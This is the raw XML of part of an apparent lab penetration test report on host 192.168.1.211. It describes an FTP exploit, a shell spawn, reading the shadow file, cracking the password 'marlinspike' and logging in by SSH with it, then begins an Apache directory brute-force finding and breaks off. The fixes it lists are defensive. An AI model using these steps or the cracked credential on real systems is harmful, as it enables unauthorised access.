        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101B9FF6" w14:textId="1C3624D4" w:rsidR="00BB3F12" w:rsidRDefault="00BB3F12" w:rsidP="00BB3F12">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a severe vulnerability that needs to be </w:t>
      </w:r>
      <w:r w:rsidR="00C95DC8">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>patched</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> immediately. If a malicious attacker gained </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>this access</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidR="009D6821">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> could easily</w:t>
      </w:r>
      <w:r w:rsidR="00BA4141">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> destroy this device with malicious code, malicious files, or many other attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DFBCBF" w14:textId="77777777" w:rsidR="00681C1D" w:rsidRDefault="00681C1D" w:rsidP="00BB3F12">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02108912" w14:textId="77777777" w:rsidR="00681C1D" w:rsidRDefault="00681C1D" w:rsidP="00BB3F12">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445FE4D3" w14:textId="4807B374" w:rsidR="00681C1D" w:rsidRPr="00F1400E" w:rsidRDefault="00990C09" w:rsidP="00BB3F12">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In addition to these vulnerabilities, once you crack the password, you can use the ssh service running to access the device through ssh (ssh is a command line interface that gives you control over </w:t>
      </w:r>
      <w:r w:rsidR="00414C35">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">the device you connect to). You can simple run </w:t>
      </w:r>
      <w:r w:rsidR="0043441D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00414C35">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00414C35" w:rsidRPr="00B54F97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:spacing w:val="-2"/>
          </w:rPr>
          <w:t>marlinspike@192.168.1.211</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0043441D">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00414C35">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>, it will ask you for a password</w:t>
      </w:r>
      <w:r w:rsidR="00B10C9A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> (this is the one we just cracked) type “marlinspike”. We now also have ssh access to the computer under marlinspike’s account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FBEB0" w14:textId="77777777" w:rsidR="00275E2C" w:rsidRPr="001360F1" w:rsidRDefault="00275E2C" w:rsidP="001735FB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A4343E7" w14:textId="1542938D" w:rsidR="00981BAA" w:rsidRDefault="00FC621F" w:rsidP="001735FB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00981BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Fix</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003A66EF">
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A66EF" w:rsidRPr="005A0441">
        <w:t>Update the FTP service on this machine to a more recent and secure version</w:t>
      </w:r>
      <w:r w:rsidR="005A0441" w:rsidRPr="005A0441">
        <w:t xml:space="preserve"> and maintain a service update schedule</w:t>
      </w:r>
      <w:r w:rsidR="0043441D">
        <w:t xml:space="preserve"> to prevent the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0043441D">
        <w:t>ftp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0043441D">
        <w:t xml:space="preserve"> service from going out-of-date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C63AB95" w14:textId="77777777" w:rsidR="00CB37AA" w:rsidRPr="005A0441" w:rsidRDefault="00CB37AA" w:rsidP="001735FB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9D5" w14:textId="76BA49E5" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="001735FB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00981BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Severity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00493839">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> Severe</w:t>
      </w:r>
      <w:r w:rsidR="00CB37AA">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9D7" w14:textId="3887CC0D" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="001735FB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00981BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Proof</w:t>
      </w:r>
      <w:r w:rsidRPr="00981BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00981BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302AC08D" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F"/>
    <w:p w14:paraId="70D95877" w14:textId="42DDF43E" w:rsidR="00442C46" w:rsidRDefault="00442C46">
      <w:r>
        <w:t>FTP access after running the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23459C36" w14:textId="77777777" w:rsidR="0043441D" w:rsidRDefault="0043441D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C959737" wp14:editId="4DBA5D8A">
            <wp:extent cx="5924550" cy="1003935"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="187676155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61558" name="Picture 5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0CA" w14:textId="77777777" w:rsidR="00442C46" w:rsidRDefault="00442C46"/>
    <w:p w14:paraId="4FBB8528" w14:textId="77777777" w:rsidR="0076527C" w:rsidRDefault="0076527C"/>
    <w:p w14:paraId="519D851D" w14:textId="77777777" w:rsidR="00442C46" w:rsidRDefault="00442C46">
      <w:r>
        <w:t>Spawning the Python Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A98F50C" w14:textId="77777777" w:rsidR="00442C46" w:rsidRDefault="00442C46"/>
    <w:p w14:paraId="1DB2F307" w14:textId="77777777" w:rsidR="0076527C" w:rsidRDefault="0076527C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F2B7945" wp14:editId="68BFE3A4">
            <wp:extent cx="3790476" cy="1466667"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="117467269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72691" name="Picture 6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F502" w14:textId="77777777" w:rsidR="0076527C" w:rsidRDefault="0076527C"/>
    <w:p w14:paraId="7D9C050D" w14:textId="77777777" w:rsidR="0076527C" w:rsidRDefault="0076527C"/>
    <w:p w14:paraId="5EEE46C2" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="63CD512B" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="2F63CB9C" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="2AC95A2F" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="47A684E4" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="23664566" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="64DF55D5" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="22A2A222" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="3AEA4FD2" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="3B3B7056" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="38B011DA" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="6BBDC251" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="19ECDB0D" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="3D1E6FC1" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="73BEAB70" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="188A5FB0" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="6456664E" w14:textId="77777777" w:rsidR="0076527C" w:rsidRDefault="0076527C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Viewing the Shadow File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D185B1" w14:textId="77777777" w:rsidR="0076527C" w:rsidRDefault="0076527C"/>
    <w:p w14:paraId="135B2D02" w14:textId="77777777" w:rsidR="0076527C" w:rsidRDefault="00AF6125">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B931F08" wp14:editId="6EBF5711">
            <wp:extent cx="5924550" cy="3641090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8188557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55738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83C7" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="4C848178" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="683E29FB" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125">
      <w:r>
        <w:t>Cracking the Hashed Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512B20CE" w14:textId="77777777" w:rsidR="00AF6125" w:rsidRDefault="00AF6125"/>
    <w:p w14:paraId="7A8BE9D9" w14:textId="1E45D988" w:rsidR="00AF6125" w:rsidRDefault="00481C48">
      <w:pPr>
        <w:sectPr w:rsidR="00AF6125">
          <w:footerReference w:type="default" r:id="rId16"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1280" w:bottom="1680" w:left="1300" w:header="0" w:footer="1496" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78B6EB01" wp14:editId="6AF99926">
            <wp:extent cx="5924550" cy="1534795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="645792506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2506" name="Picture 9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9DA" w14:textId="0FE39CC6" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9188"/>
        </w:tabs>
        <w:spacing w:before="71"/>
        <w:ind w:left="11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2224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A8BEA53" wp14:editId="7A8BEA54">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>899998</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>242722</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5760085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D73E1" id="Graphic 12" o:spid="_x0000_s1026" style="position:absolute;margin-left:70.85pt;margin-top:19.1pt;width:453.55pt;height:.1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" path="m,l5759996,e" filled="f" strokeweight=".14039mm">
                <v:path arrowok="t"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00363D51">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Ethical Hacking Penetration Test Report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>202</w:t>
      </w:r>
      <w:r w:rsidR="00342725">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00342725">
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00342725">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9DB" w14:textId="3B49BCF5" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="764"/>
        </w:tabs>
        <w:ind w:left="764" w:hanging="647"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_bookmark12"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>IP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00AF43E3">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AF43E3">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9DC" w14:textId="4620BE6A" w:rsidR="005D4D8F" w:rsidRDefault="00315815" w:rsidP="00683920">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="891"/>
        </w:tabs>
        <w:spacing w:before="282"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_bookmark13"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Service </w:t>
      </w:r>
      <w:r w:rsidR="00DC6855">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9DD" w14:textId="1DD85551" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4867"/>
        </w:tabs>
        <w:spacing w:before="260" w:line="530" w:lineRule="atLeast"/>
        <w:ind w:left="3043" w:right="3061"/>
      </w:pPr>
      <w:r>
        <w:rPr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7A8BEA55" wp14:editId="7A8BEA56">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2758097</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>198843</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2044064" cy="2032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064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064" h="20320">
                              <a:moveTo>
                                <a:pt x="2043798" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="20205"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2043798" y="20205"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2043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54E1" id="Graphic 13" o:spid="_x0000_s1026" style="position:absolute;margin-left:217.15pt;margin-top:15.65pt;width:160.95pt;height:1.6pt;z-index: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4406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" path="m2043798,l,,,20205r2043798,l2043798,xe" fillcolor="#999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7A8BEA57" wp14:editId="7A8BEA58">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2758097</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>553580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2044064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0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064">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="2043798" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="6921">
                          <a:solidFill>
                            <a:srgbClr val="99999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F28C" id="Graphic 14" o:spid="_x0000_s1026" style="position:absolute;margin-left:217.15pt;margin-top:43.6pt;width:160.95pt;height:.1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440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" path="m,l2043798,e" filled="f" strokecolor="#999" strokeweight=".19225mm">
                <v:path arrowok="t"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Server IP Address</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ports Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00DC0976">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DC0976">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>211</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00991238">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>21, 22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00991238">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9DE" w14:textId="565179C6" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:spacing w:before="14"/>
        <w:ind w:left="4868"/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7A8BEA59" wp14:editId="7A8BEA5A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2758097</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>237820</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2044064" cy="2032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064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064" h="20320">
                              <a:moveTo>
                                <a:pt x="2043798" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="20205"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2043798" y="20205"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2043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7122A" id="Graphic 15" o:spid="_x0000_s1026" style="position:absolute;margin-left:217.15pt;margin-top:18.75pt;width:160.95pt;height:1.6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44064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" path="m2043798,l,,,20205r2043798,l2043798,xe" fillcolor="#999" stroked="f">
                <v:path arrowok="t"/>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9DF" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="145"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9E0" w14:textId="70128F46" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:ind w:left="117"/>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Scan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Results:</w:t>
      </w:r>
      <w:r w:rsidR="00AB5ED1">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB5ED1">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB5ED1">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB5ED1">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan results for this vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00342725">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00AB5ED1">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> the same as </w:t>
      </w:r>
      <w:r w:rsidR="000074DB">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>shown previously. Please refer t</w:t>
      </w:r>
      <w:r w:rsidR="00342725">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="000074DB">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> the image on page 4 for details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B502EDD" w14:textId="77777777" w:rsidR="00122D38" w:rsidRPr="00AB5ED1" w:rsidRDefault="00122D38">
      <w:pPr>
        <w:ind w:left="117"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D6FF7A" w14:textId="16FE3344" w:rsidR="00122D38" w:rsidRDefault="00FC621F" w:rsidP="00122D38">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00122D38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00122D38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00122D38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00122D38">
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r w:rsidR="003A30FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A9785D">
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="003A30FC">
        <w:t xml:space="preserve"> server running on this </w:t>
      </w:r>
      <w:r w:rsidR="00A9785D">
        <w:t xml:space="preserve">system is hosting a website. When you navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00395AD1" w:rsidRPr="00B54F97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.211</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00395AD1">
        <w:t xml:space="preserve"> on your web browser</w:t>
      </w:r>
      <w:r w:rsidR="00A9785D">
        <w:t>, you encounter a white screen</w:t>
      </w:r>
      <w:r w:rsidR="00395AD1">
        <w:t xml:space="preserve"> that informs you that the site exists, but nothing is there. You can then run a tool </w:t>
      </w:r>
      <w:r w:rsidR="00783708">
        <w:t xml:space="preserve">called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00783708">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00783708">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00783708">
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00783708">
        <w:t xml:space="preserve"> website directories and see if any others exist. There is a secret directory that can be accessed, then through </w:t>
      </w:r>
      <w:r w:rsidR="000A72F0">
        <w:t xml:space="preserve">further investigation, admin access to the secret website </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000A72F0">
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000A72F0">
